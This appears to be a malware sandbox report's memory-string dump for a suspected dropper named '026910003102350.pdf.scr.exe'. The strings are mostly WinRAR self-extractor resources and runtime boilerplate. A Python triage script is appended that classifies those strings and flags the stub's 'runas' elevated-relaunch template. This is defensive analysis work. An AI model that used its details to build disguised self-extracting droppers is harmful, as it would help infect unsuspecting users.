Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: select * from win32_operatingsystem
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: *messages***
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ...root\cimv2select * from win32_operatingsystemwqlnamewindows 10*?.rar.exe.sfx00?*<>|"?*%c:\\\?\uncconprnauxnulcom#lpt#*messages****messages***r!
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: cryptprotectmemory
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: cryptunprotectmemory
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: xlistpos
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setdlldirectoryw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setdefaultdlldirectories
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: unknown exception
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: bad allocation
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: waitformultipleobjects error %d, getlasterror %d
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: thread pool initialization failed.%ls>%s: %s
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: unknown exceptionbad allocation
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: z2fq`
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head></html></p><br><style></style><style>body{font-family:"arial";font-size:12;}</style>&nbsp;
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_browsetitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cmdextracting
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_skipping
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_unexpeof
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_fileheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_headerbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_mainheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cmtheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cmtbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_outofmemoryerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_unknownmethod
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cannotopen
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cannotcreate
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cannotmkdir
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_encrcrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_extrcrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_packeddatacrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_writeerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_readerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_closeerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cannotfindvol
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_badarchive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_extracting
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_asknextvoltitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_archeaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_done
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_error
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_errors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_bytes
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_modifiedon
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_badfolder
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_createerrors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_restarthint
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_crcerrors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_allfiles
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_title1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_title1a
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_title2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_title3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_title4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_title5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_title6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_arcbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_extrfilesto
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_extrfilestotemp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_extractbutton
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_extractprogress
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_maxpathlimit
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_unkencmethod
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_wrongpassword
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_wrongfilepassword
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_copyerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cannotcreatelnks
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_cannotcreatelnkh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_errlnktarget
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_needadmin
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_pause
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_continue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_secwarning
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: s:ids_secdeldll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $startdlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $startdlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $startdlg:idc_destedittitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $startdlg:idc_changedir
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $startdlg:idc_progressbartitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $startdlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $startdlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owrfileexists
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owraskreplace
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owrquestion
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owryes
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owrall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owrrename
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owrno
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owrnoall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $replacefiledlg:idc_owrcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $renamedlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $renamedlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $renamedlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $renamedlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $renamedlg:idc_renamefrom
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $renamedlg:idc_renameto
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $getpassword1:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $getpassword1:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $getpassword1:idc_passwordenter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $getpassword1:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $getpassword1:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $licensedlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $licensedlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $licensedlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $licensedlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $asknextvol:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $asknextvol:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $asknextvol:idc_nextvolinfo1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $asknextvol:idc_nextvolfind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $asknextvol:idc_nextvolinfo2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $asknextvol:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $asknextvol:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: user32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: gdi32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: comdlg32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: advapi32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: shell32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ppngriched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldll$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensedlg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfind$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfxstaticreplacefiledlgrenamedlg%s %s %s%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg __tmp_rar_sfx_access_check_%u-el -s2 "-d%s" "-sp%s"runas"%s"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: %sdeletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode%s.%d.tmpsoftware\microsoft\windows\currentversionprogramfilesdir\hidemaxmin%s%s%u.lnk.infinstallsoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dll
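The string hits in this memory region are dominated by two kinds of boilerplate: WinRAR SFX stub resources (the `$startdlg`/`$getpassword1`/`$asknextvol` dialog names, `rarsfx`, `winrarsfxmappingfile.tmp`, `software\winrar sfx`) and MSVC CRT internals (the `__cdecl`/`` `vftable' `` demangler table, `nan(ind)`, the locale lists). They tell an analyst that the outer layer of the sample is a WinRAR self-extractor, not what the payload does. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code; it parses "Binary or memory string" lines of the form shown here, sorts them into SFX-stub, CRT-noise, junk and needs-review buckets, and pulls out the `__tmp_rar_sfx_access_check_%u` / `runas` / `-el -s2 "-d%s" "-sp%s"` triple. The marker lists and the reading of that triple as the SFX stub's write-access probe followed by an elevated self-relaunch are my assumptions from the public WinRAR SFX module and MSVC CRT, not claims the report makes; the sample input is a constructed subset of the report's own lines.

```python
"""Triage 'Binary or memory string' hits from a sandbox report (added example)."""
import re
from collections import defaultdict

# Constructed sample input: lines copied verbatim from the report section
# (one or more representatives for each bucket the script distinguishes).
REPORT_LINES = r"""
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: $getpassword1:idc_passwordenter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __tmp_rar_sfx_access_check_%u-el -s2 "-d%s" "-sp%s"runas"%s"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: %sdeletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode%s.%d.tmpsoftware\microsoft\windows\currentversionprogramfilesdir\hidemaxmin%s%s%u.lnk.infinstallsoftware\winrar sfxuser32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vector deleting destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __fastcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: nan(ind)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: mscoree.dllcorexitprocess`
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: acquiresrwlockexclusive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: <5ikq
"""

# One report line: sample name, dump-region name, then the string itself.
LINE_RE = re.compile(
    r"^Source: (?P<sample>[^,]+), (?P<region>\S+) Binary or memory string: (?P<string>.*)$"
)

# Assumed marker lists (from public WinRAR SFX module and MSVC CRT constants,
# not from the report): substrings that identify boilerplate on sight.
SFX_MARKERS = (
    "rarsfx", "winrar sfx", "winrarsfxmappingfile.tmp",
    "__tmp_rar_sfx_access_check_", "getpassword1", "asknextvol",
    "replacefiledlg", "licensedlg", "startdlg", "renamedlg",
)
CRT_MARKERS = (
    "__cdecl", "__stdcall", "__fastcall", "__thiscall", "__vectorcall",
    "`vftable'", "`vbtable'", "deleting destructor'", "constructor iterator'",
    "nan(", "1#inf", "1#qnan", "mscoree.dll", "corexitprocess",
    "api-ms-win-", "flsalloc", "bad array new length",
)

# Assumed argument template the SFX stub passes to its elevated copy.
ELEVATION_RE = re.compile(r'-el -s2 "-d%s" "-sp%s"')


def parse(report_text):
    """Yield (sample, region, string) for every well-formed report line."""
    for line in report_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("sample"), m.group("region"), m.group("string")


def classify(s):
    """Bucket one string: winrar-sfx, msvc-crt, junk, or review."""
    low = s.lower()
    if any(marker in low for marker in SFX_MARKERS):
        return "winrar-sfx"
    if any(marker in low for marker in CRT_MARKERS):
        return "msvc-crt"
    # Short hits with no four-letter run are printable code/data bytes,
    # not text worth an analyst's time.
    if len(s) < 8 and not re.search(r"[a-z]{4,}", low):
        return "junk"
    return "review"


def triage(report_text):
    """Return {bucket: [strings]} for all hits in the report text."""
    buckets = defaultdict(list)
    for _sample, _region, s in parse(report_text):
        buckets[classify(s)].append(s)
    return dict(buckets)


def sfx_elevation_hints(report_text):
    """Collect the SFX stub's access-probe and elevated-relaunch evidence.

    Reading (assumption): the stub writes __tmp_rar_sfx_access_check_<n> to
    test the destination, and if that fails re-executes itself with the
    'runas' verb and the -el -s2 -d -sp argument template.  The strings are
    the report's; the interpretation is this example's.
    """
    hints = {"access_probe": False, "runas_relaunch": False, "relaunch_args": None}
    for _sample, _region, s in parse(report_text):
        if "__tmp_rar_sfx_access_check_" in s:
            hints["access_probe"] = True
        m = ELEVATION_RE.search(s)
        if m and "runas" in s:
            hints["runas_relaunch"] = True
            hints["relaunch_args"] = m.group(0)
    return hints


if __name__ == "__main__":
    for bucket, strings in sorted(triage(REPORT_LINES).items()):
        print(f"{bucket:11s} {len(strings):3d}  e.g. {strings[0][:60]!r}")
    print(sfx_elevation_hints(REPORT_LINES))
```

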